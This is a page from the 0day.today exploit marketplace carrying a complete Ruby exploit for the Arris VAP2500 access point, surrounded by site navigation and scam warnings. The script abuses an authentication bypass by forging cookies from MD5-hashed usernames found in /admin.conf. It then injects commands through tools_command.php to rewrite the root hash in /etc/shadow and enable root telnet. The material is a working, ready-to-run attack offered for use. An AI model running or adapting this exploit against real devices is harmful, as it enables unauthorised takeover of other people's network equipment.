0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Arris VAP2500 Authentication Bypass Vulnerability
#!/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV[0] puts "Usage: #{$0} <vap2500_ip_address>" exit(0) end host = ARGV[0] new_pass = "h4x0r3d!" http = Net::HTTP.new(host).start users = nil users = http.request_get("/admin.conf").body.split("\n").map! {|user| user.sub(/^(.*?),.*$/,"\\1")} if users puts "[*] found user accounts: #{users.inspect}" puts "[*] checking for root privs" else puts "[!!!] could not find any user accounts. exiting." exit(-1) end root_privs = nil users.each {|user| if http.request_post("/tools_command.php","cmb_header=&txt_command=whoami",{"Cookie" => "p=#{Digest::MD5.hexdigest(user)}"}).body =~ /root/ puts "[*] root privs found: #{user}" root_privs = user break end } if !root_privs puts "[!!!] could not find a root priv account. exiting." exit(-1) end puts "[*] modifying root password" new_hash = new_pass.crypt("$1$#{new_pass}$").gsub("$","\\$") http.request_post("/tools_command.php","cmb_header=&txt_command=sed -i -r \"s/root:[^:]*:(.*)/root:#{new_hash}:\\1/g\" /etc/shadow",{"Cookie" => "p=#{Digest::MD5.hexdigest(root_privs)}"}) puts "[*] enabling telnet" if http.request_post("/tools_command.php","cmb_header=&txt_command=rm /mnt/jffs2/telnet-disabled; sh /etc/init.d/S42inetd start",{"Cookie" => "p=#{Digest::MD5.hexdigest(root_privs)}"}).body =~ /Starting inetd/ puts "[*] success! telnet to #{host} (user:root pass:#{new_pass})" else puts "[!!!] couldn't start telnet" end # 0day.today [2024-07-02] #